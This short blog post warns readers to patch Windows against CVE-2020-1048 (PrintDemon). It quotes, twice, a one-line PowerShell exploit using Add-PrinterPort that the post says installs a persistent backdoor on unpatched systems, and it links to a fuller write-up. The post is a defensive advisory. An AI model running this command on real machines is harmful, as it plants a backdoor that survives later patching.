Posted by jpluimers on 2020/05/14
Patch Windows now. Attackers can exploit CVE-2020-1048 with a single PowerShell command:
Add-PrinterPort -Name c:\windows\system32\ualapi.dll
Attackers can exploit CVE-2020-1048 with a single PowerShell command:
Add-PrinterPort -Name c:\windows\system32\ualapi.dll
On an unpatched system, this will install a persistent backdoor, that won’t go away even after you patch.
See https://windows-internals.com/printdemon-cve-2020-1048/ for more details.
Leave a Reply